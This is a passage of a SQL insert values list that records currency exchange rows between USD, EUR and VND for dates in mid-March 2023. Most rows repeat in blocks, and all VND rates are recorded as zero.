(1035, 2, 'EUR', 0.000000, 1, 'USD', 1.054900, '2023-03-16'),
(1036, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1037, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-16'),
(1038, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-16'),
(1039, 1, 'USD', 1.000000, 2, 'EUR', 0.947960, '2023-03-16'),
(1040, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1041, 2, 'EUR', 1.000000, 1, 'USD', 1.054900, '2023-03-16'),
(1042, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1043, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-16'),
(1044, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-16'),
(1045, 1, 'USD', 0.000000, 2, 'EUR', 0.947960, '2023-03-16'),
(1046, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1047, 2, 'EUR', 0.000000, 1, 'USD', 1.054900, '2023-03-16'),
(1048, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1049, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-16'),
(1050, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-16'),
(1051, 1, 'USD', 1.000000, 2, 'EUR', 0.947960, '2023-03-16'),
(1052, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1053, 2, 'EUR', 1.000000, 1, 'USD', 1.054900, '2023-03-16'),
(1054, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1055, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-16'),
(1056, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-16'),
(1057, 1, 'USD', 0.000000, 2, 'EUR', 0.947960, '2023-03-16'),
(1058, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1059, 2, 'EUR', 0.000000, 1, 'USD', 1.054900, '2023-03-16'),
(1060, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1061, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-16'),
(1062, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-16'),
(1063, 1, 'USD', 1.000000, 2, 'EUR', 0.947960, '2023-03-17'),
(1064, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1065, 2, 'EUR', 1.000000, 1, 'USD', 1.054900, '2023-03-17'),
(1066, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1067, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-17'),
(1068, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-17'),
(1069, 1, 'USD', 0.000000, 2, 'EUR', 0.943840, '2023-03-17'),
(1070, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1071, 2, 'EUR', 0.000000, 1, 'USD', 1.059500, '2023-03-17'),
(1072, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1073, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-17'),
(1074, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-17'),
(1075, 1, 'USD', 1.000000, 2, 'EUR', 0.943840, '2023-03-17'),
(1076, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1077, 2, 'EUR', 1.000000, 1, 'USD', 1.059500, '2023-03-17'),
(1078, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1079, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-17'),
(1080, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-17'),
(1081, 1, 'USD', 0.000000, 2, 'EUR', 0.943840, '2023-03-17'),
(1082, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1083, 2, 'EUR', 0.000000, 1, 'USD', 1.059500, '2023-03-17'),
(1084, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1085, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-17'),
(1086, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-17'),
(1087, 1, 'USD', 1.000000, 2, 'EUR', 0.943840, '2023-03-17'),
(1088, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1089, 2, 'EUR', 1.000000, 1, 'USD', 1.059500, '2023-03-17'),
(1090, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1091, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-17'),
(1092, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-17'),
(1093, 1, 'USD', 0.000000, 2, 'EUR', 0.943840, '2023-03-17'),
(1094, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1095, 2, 'EUR', 0.000000, 1, 'USD', 1.059500, '2023-03-17'),
(1096, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1097, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-17'),
(1098, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-17'),
(1099, 1, 'USD', 1.000000, 2, 'EUR', 0.943840, '2023-03-17'),
(1100, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1101, 2, 'EUR', 1.000000, 1, 'USD', 1.059500, '2023-03-17'),
(1102, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1103, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-17'),
(1104, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-17'),
(1105, 1, 'USD', 0.000000, 2, 'EUR', 0.943840, '2023-03-17'),
(1106, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1107, 2, 'EUR', 0.000000, 1, 'USD', 1.059500, '2023-03-17'),
(1108, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-17'),
(1109, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-17'),
(1110, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-17'),
(1111, 1, 'USD', 1.000000, 2, 'EUR', 0.943840, '2023-03-18'),
(1112, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1113, 2, 'EUR', 1.000000, 1, 'USD', 1.059500, '2023-03-18'),
(1114, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1115, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-18'),
(1116, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-18'),
(1117, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-18'),
(1118, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1119, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-18'),
(1120, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1121, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-18'),
(1122, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-18'),
(1123, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-18'),
(1124, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1125, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-18'),
(1126, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1127, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-18'),
(1128, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-18'),
(1129, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-18'),
(1130, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1131, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-18'),
(1132, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1133, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-18'),
(1134, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-18'),
(1135, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-18'),
(1136, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1137, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-18'),
(1138, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1139, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-18'),
(1140, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-18'),
(1141, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-18'),
(1142, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1143, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-18'),
(1144, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1145, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-18'),
(1146, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-18'),
(1147, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-18'),
(1148, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1149, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-18'),
(1150, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1151, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-18'),
(1152, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-18'),
(1153, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-18'),
(1154, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1155, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-18'),
(1156, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-18'),
(1157, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-18'),
(1158, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-18'),
(1159, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-19'),
(1160, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1161, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-19'),
(1162, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1163, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-19'),
(1164, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-19'),
(1165, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-19'),
(1166, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1167, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-19'),
(1168, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1169, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-19'),
(1170, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-19'),
(1171, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-19'),
(1172, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1173, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-19'),
(1174, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1175, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-19'),
(1176, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-19'),
(1177, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-19'),
(1178, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1179, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-19'),
(1180, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1181, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-19'),
(1182, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-19'),
(1183, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-19'),
(1184, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1185, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-19'),
(1186, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1187, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-19'),
(1188, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-19'),
(1189, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-19'),
(1190, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1191, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-19'),
(1192, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1193, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-19'),
(1194, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-19'),
(1195, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-19'),
(1196, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1197, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-19'),
(1198, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1199, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-19'),
(1200, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-19'),
(1201, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-19'),
(1202, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1203, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-19'),
(1204, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-19'),
(1205, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-19'),
(1206, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-19'),
(1207, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-20'),
(1208, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1209, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-20'),
(1210, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1211, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-20'),
(1212, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-20'),
(1213, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-20'),
(1214, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1215, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-20'),
(1216, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1217, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-20'),
(1218, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-20'),
(1219, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-20'),
(1220, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1221, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-20'),
(1222, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1223, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-20'),
(1224, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-20'),
(1225, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-20'),
(1226, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1227, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-20'),
(1228, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1229, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-20'),
(1230, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-20'),
(1231, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-20'),
(1232, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1233, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-20'),
(1234, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1235, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-20'),
(1236, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-20'),
(1237, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-20'),
(1238, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1239, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-20'),
(1240, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1241, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-20'),
(1242, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-20'),
(1243, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-20'),
(1244, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1245, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-20'),
(1246, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1247, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-20'),
(1248, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-20'),
(1249, 1, 'USD', 0.000000, 2, 'EUR', 0.941350, '2023-03-20'),
(1250, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1251, 2, 'EUR', 0.000000, 1, 'USD', 1.062300, '2023-03-20'),
(1252, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-20'),
(1253, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-20'),
(1254, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-20'),
(1255, 1, 'USD', 1.000000, 2, 'EUR', 0.941350, '2023-03-21'),
(1256, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1257, 2, 'EUR', 1.000000, 1, 'USD', 1.062300, '2023-03-21'),
(1258, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1259, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-21'),
(1260, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-21'),
(1261, 1, 'USD', 0.000000, 2, 'EUR', 0.933100, '2023-03-21'),
(1262, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1263, 2, 'EUR', 0.000000, 1, 'USD', 1.071700, '2023-03-21'),
(1264, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1265, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-21'),
(1266, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-21'),
(1267, 1, 'USD', 1.000000, 2, 'EUR', 0.933100, '2023-03-21'),
(1268, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1269, 2, 'EUR', 1.000000, 1, 'USD', 1.071700, '2023-03-21'),
(1270, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1271, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-21'),
(1272, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-21'),
(1273, 1, 'USD', 0.000000, 2, 'EUR', 0.933100, '2023-03-21'),
(1274, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1275, 2, 'EUR', 0.000000, 1, 'USD', 1.071700, '2023-03-21'),
(1276, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1277, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-21'),
(1278, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-21'),
(1279, 1, 'USD', 1.000000, 2, 'EUR', 0.933100, '2023-03-21'),
(1280, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1281, 2, 'EUR', 1.000000, 1, 'USD', 1.071700, '2023-03-21'),
(1282, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1283, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-21'),
(1284, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-21'),
(1285, 1, 'USD', 0.000000, 2, 'EUR', 0.933100, '2023-03-21'),
(1286, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1287, 2, 'EUR', 0.000000, 1, 'USD', 1.071700, '2023-03-21'),
(1288, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1289, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-21'),
(1290, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-21'),
(1291, 1, 'USD', 1.000000, 2, 'EUR', 0.933100, '2023-03-21'),
(1292, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1293, 2, 'EUR', 1.000000, 1, 'USD', 1.071700, '2023-03-21'),
(1294, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1295, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-21'),
(1296, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-21'),
(1297, 1, 'USD', 0.000000, 2, 'EUR', 0.933100, '2023-03-21'),
(1298, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1299, 2, 'EUR', 0.000000, 1, 'USD', 1.071700, '2023-03-21'),
(1300, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-21'),
(1301, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-21'),
(1302, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-21'),
(1303, 1, 'USD', 1.000000, 2, 'EUR', 0.933100, '2023-03-22'),
(1304, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1305, 2, 'EUR', 1.000000, 1, 'USD', 1.071700, '2023-03-22'),
(1306, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1307, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-22'),
(1308, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-22'),
(1309, 1, 'USD', 0.000000, 2, 'EUR', 0.927990, '2023-03-22'),
(1310, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1311, 2, 'EUR', 0.000000, 1, 'USD', 1.077600, '2023-03-22'),
(1312, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1313, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-22'),
(1314, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-22'),
(1315, 1, 'USD', 1.000000, 2, 'EUR', 0.927990, '2023-03-22'),
(1316, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1317, 2, 'EUR', 1.000000, 1, 'USD', 1.077600, '2023-03-22'),
(1318, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1319, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-22'),
(1320, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-22'),
(1321, 1, 'USD', 0.000000, 2, 'EUR', 0.927990, '2023-03-22'),
(1322, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1323, 2, 'EUR', 0.000000, 1, 'USD', 1.077600, '2023-03-22'),
(1324, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1325, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-22'),
(1326, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-22'),
(1327, 1, 'USD', 1.000000, 2, 'EUR', 0.927990, '2023-03-22'),
(1328, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1329, 2, 'EUR', 1.000000, 1, 'USD', 1.077600, '2023-03-22'),
(1330, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1331, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-22'),
(1332, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-22'),
(1333, 1, 'USD', 0.000000, 2, 'EUR', 0.927990, '2023-03-22'),
(1334, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1335, 2, 'EUR', 0.000000, 1, 'USD', 1.077600, '2023-03-22'),
(1336, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1337, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-22'),
(1338, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-22'),
(1339, 1, 'USD', 1.000000, 2, 'EUR', 0.927990, '2023-03-22'),
(1340, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1341, 2, 'EUR', 1.000000, 1, 'USD', 1.077600, '2023-03-22'),
(1342, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1343, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-22'),
(1344, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-22'),
(1345, 1, 'USD', 0.000000, 2, 'EUR', 0.927990, '2023-03-22'),
(1346, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1347, 2, 'EUR', 0.000000, 1, 'USD', 1.077600, '2023-03-22'),
(1348, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-22'),
(1349, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-22'),
(1350, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-22'),
(1351, 1, 'USD', 1.000000, 2, 'EUR', 0.927990, '2023-03-23'),
(1352, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1353, 2, 'EUR', 1.000000, 1, 'USD', 1.077600, '2023-03-23'),
(1354, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1355, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-23'),
(1356, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-23'),
(1357, 1, 'USD', 0.000000, 2, 'EUR', 0.927210, '2023-03-23'),
(1358, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1359, 2, 'EUR', 0.000000, 1, 'USD', 1.078500, '2023-03-23'),
(1360, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1361, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-23'),
(1362, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-23'),
(1363, 1, 'USD', 1.000000, 2, 'EUR', 0.927210, '2023-03-23'),
(1364, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1365, 2, 'EUR', 1.000000, 1, 'USD', 1.078500, '2023-03-23'),
(1366, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1367, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-23'),
(1368, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-23'),
(1369, 1, 'USD', 0.000000, 2, 'EUR', 0.927210, '2023-03-23'),
(1370, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1371, 2, 'EUR', 0.000000, 1, 'USD', 1.078500, '2023-03-23'),
(1372, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1373, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-23'),
(1374, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-23'),
(1375, 1, 'USD', 1.000000, 2, 'EUR', 0.927210, '2023-03-23'),
(1376, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1377, 2, 'EUR', 1.000000, 1, 'USD', 1.078500, '2023-03-23'),
(1378, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1379, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-23'),
(1380, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-23'),
(1381, 1, 'USD', 0.000000, 2, 'EUR', 0.927210, '2023-03-23'),
(1382, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1383, 2, 'EUR', 0.000000, 1, 'USD', 1.078500, '2023-03-23'),
(1384, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-23'),
(1385, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-23'),
